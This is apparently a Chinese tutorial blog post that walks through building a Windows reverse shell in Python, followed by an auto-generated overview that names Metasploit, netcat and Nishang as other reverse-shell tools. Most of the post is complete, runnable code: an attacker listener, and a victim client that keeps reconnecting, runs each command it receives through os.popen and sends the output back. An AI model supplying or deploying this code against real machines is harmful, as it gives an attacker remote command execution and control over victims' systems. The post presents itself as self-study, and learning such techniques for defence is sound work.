Windows下的反弹shell

今天学习内容就是反弹shell啦~~
当服务器端攻击客户端时,此时客户端IP地址未知,所以要使用反向shell
在这里分别写服务器端代码和客户端代码;注:每次运行时要先开服务器端
服务器端(攻击者,导入模块:import socket)
基本步骤:
1、创建套接字

s=socket.socket()

2、进行绑定(ip:允许连接的ip,服务器端端口)

s.bind(("0.0.0.0",6666))

3、允许连入的主机数

s.listen()

4、创建接口与连入的主机地址

con,addr=s.accept()

具体代码:

import socket

s = socket.socket()
s.bind(('0.0.0.0',6666))
s.listen(5)
con,addr = s.accept()
print(addr)

for i in range(3):
    cmd = input('第%d条命令:'%(i+1))
    con.send(cmd.encode())
    result = con.recv(65536)
    print(result.decode())
con.close()

客户端(被攻击者,导入模块:import socket,import os)
基本步骤:
1、创建套接字,连接服务器(ip:服务器端,端口:服务器端)

s=socket.socket()
s.connect(('127.0.0.1',6666))

2、收发数据

cmd = s.recv(1024).decode()
s.send(result.encode())

3、关闭套接字

s.close()

具体代码:

import os
import time
import socket

s = socket.socket()


while 1:
    try:
        s.connect(('127.0.0.1',6666))
        break
    except:
        time.sleep(5)
        
for i in range(3):
    cmd = s.recv(1024).decode()
    print('收到的第%d条命令'%(i+1),cmd)
    result = os.popen(cmd).read()
    if result:
        s.send(result.encode())
    else:
        if cmd[:2] == 'cd':
            os.chdir(cmd[2:].strip())
        s.send(b'OK!')
        
s.close()
   
   

实现效果图:
客户端:
在这里插入图片描述
服务器端:
在这里插入图片描述
enen~~就酱紫

  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Windows系统中,反弹shell是一种常见的攻击技术,用于获取对目标机器的远程访问权限。有几种常见的方法可以实现Windows反弹shell。 一种方法是使用Metasploit框架。首先,使用msfvenom生成一个powershell类型的木马,然后开启监听端口。目标机在命令提示符下执行生成的powershell脚本,即可实现反弹shell。需要注意的是,有时由于防火墙的原因,控制可能会不稳定。\[1\] 另一种方法是使用nc(netcat)工具进行反弹。通过nc反弹得到的shell可能不是一个完全交互的shell,某些命令可能无效。相比之下,通过Python脚本得到的shell可以实现对被控制主机的任意操作。\[2\] 此外,还有一些基于PowerShell的攻击框架,如Nishang,它集合了一些PowerShell攻击脚本和有效载荷,可用于反弹TCP/UDP/HTTP/HTTPS/ICMP等类型的shell。\[3\] 总结起来,Windows反弹shell的方法包括使用Metasploit框架、nc工具以及基于PowerShell的攻击框架。具体选择哪种方法取决于实际需求和环境。 #### 引用[.reference_title] - *1* *2* [Windows反弹shell的方式](https://blog.csdn.net/ws1813004226/article/details/117248359)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Windows反弹shell的方法](https://blog.csdn.net/qq_39101049/article/details/96191861)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值